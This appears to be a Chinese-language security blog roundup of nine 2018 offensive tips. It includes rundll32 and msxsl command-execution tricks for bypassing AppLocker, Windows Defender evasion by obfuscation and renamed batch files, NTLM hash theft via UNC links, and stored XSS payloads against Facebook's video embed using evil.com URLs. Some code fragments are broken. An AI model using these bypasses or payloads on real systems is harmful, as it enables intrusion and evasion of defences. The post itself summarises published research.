如何在3天內在Facebook上找到3個存儲的XSS；俄羅斯gov上的apt攻擊手法

9種姿勢已經幫你準備好了

自行領取吧～

xxp

1、執行hta文件，繞過applocker執行命令

以下兩條命令可繞過applocker執行hta文件，能繞過AppLocker默認配置，不需要真實的web的url：

1rundll32.exeurl.dll,OpenURL"localpath oharmless.hta"

2rundll32.exeurl.dll,OpenURLA"localpath oharmless.hta"

參考鏈接

https://twitter.com/bohops/status/974043815655956481

2.使用FRIDA繞過Android 7.0網路安全配置

默認情況下，面向 Android 7.0 的應用僅信任系統提供的證書，且不再信任用戶添加的證書頒發機構 (CA)。通過frida替換verifyChain 原來的不可信鏈並重新執行，將不可信的證書添加到現有的可信證書中。

簡單的Frida鉤子示例如下：

參考鏈接：

https://sensepost.com/blog/2018/tip-toeing-past-android-7s-network-security-configuration/

https://github.com/sensepost/objection/blob/d53ff2c4dec31d3cf5ea6dd8c657e36777ad16da/objection/hooks/android/pinning/disable.js#L134-L181

3.俄羅斯gov上的apt攻擊手法

在一篇關於俄羅斯的apt攻擊上獲到的一個姿勢，在水坑攻擊的過程中，利用file:// UNC獲取用戶的hash值。

參考鏈接：

https://www.us-cert.gov/ncas/alerts/TA18-074A

4.利用混淆繞過Windows Defender保護

一般攻擊者通過PowerShell的encoded命令,進行base64編碼達到Windows denfender的繞過,但在Windows 10的Windows Defender已經可能進行檢測。研究者發現通過Daniel Bohannon的 Invoke-Obfuscation工具，對當前payload進行混淆，欺騙Windows Defender進行惡意代碼執行。

參考鏈接：

http://www.offensiveops.io/tools/cobalt-strike-bypassing-windows-defender-with-obfuscation/

工具的獲取：

https://github.com/danielbohannon/Invoke-Obfuscation

5.繞過Windows Defender進行攻擊

Windows Defender通過添加特殊規則，會增加攻擊者的成本。利用代碼批處理文件，並被命名為文本文件。寫完文件後，使用filesystemobject和movefile方法重命名文件並移入當前用戶啟動文件夾，利用這方式繞過了規則。

參考鏈接：

https://twitter.com/Oddvarmoe/status/974320004652027907

https://oddvar.moe/2018/03/15/windows-defender-attack-surface-reduction-rules-bypass/

6.Casey Smith@subTee介紹一種姿勢，利用msxsl.exe執行系統命令

1

2xmlns:ms="urn:schemas-microsoft-com:xslt"xmlns:u="p"version="1.0">

3r=new

4ActiveXObject("http://WScript.Shell ").Run("cmd.exe")

5

參考鏈接：

https://twitter.com/subTee/status/975130981710495744

7.如何在3天內在Facebook上找到3個存儲的XSS

Enguerran Gillier發現在Facebook上3個存儲型XSS漏洞，Facebook通過使用Open Graph嵌入外部視頻，當用戶點擊播放視頻時，XSS將在facebook.com上執行。

1）使用FlashMediaElement.sw觸發XSS

如果ogVideoUrl設置為：

1http://evil.com/video.flv#"+alert(document.domain+"XSSed!")+"

那麼Facebook將執行如下代碼觸發XSS

1log("http://evil.com/video.flv?"+alert(document.domain+" XSSed!")+"")

2）無flash存儲型XSS

如果ogVideoUrl設置為：

1http://evil.com/#" onload="alert(document.domain)"

playerDiv.innerHTML會轉換成如下標籤觸發XSS

1

2onload="alert(document.domain)"?api=1">

3.ogVideoType未知錯誤XSS

當ogVideoType是未知的東西，比如「video/nothing」時，Facebook會顯示一條錯誤消息，其鏈接為ogVideoUrl，如下所示：

1errorDiv.innerHTML =""

所以ogVideoUrl 有效載荷

1https://opnsec.com/#">

errorDiv.innerHTML執行如下代碼觸發XSS

1

2onerror="alert(document.domain)">

參考鏈接：

https://twitter.com/opnsec/status/975398698518708224

https://opnsec.com/2018/03/stored-xss-on-facebook/

8.未越獄的iOS應用程序動態安全分析

動態分析可幫助應用運行時檢查程序的狀態（存儲器內容，寄存器，變數值工作邏輯等）。下圖為動態分析步驟及每一步驟所使用到的工具。

參考鏈接：

https://medium.com/@ansjdnakjdnajkd/dynamic-analysis-of-ios-apps-wo-jailbreak-1481ab3020d8

9.CONTROL.EXE載入無符號的ADS反射DLL繞過AppLocker

@bohops展示了利用CONTROL.EXE載入無符號的ADS（供選數據流）反射DLL繞過AppLocker。Control.exe是微軟Windows操作系統自帶的程序，用於訪問控制面板。

參考鏈接：

https://twitter.com/bohops/status/954466315913310209

歡迎酷愛技術的你來破殼交流。

喜歡這篇文章嗎？立刻分享出去讓更多人知道吧！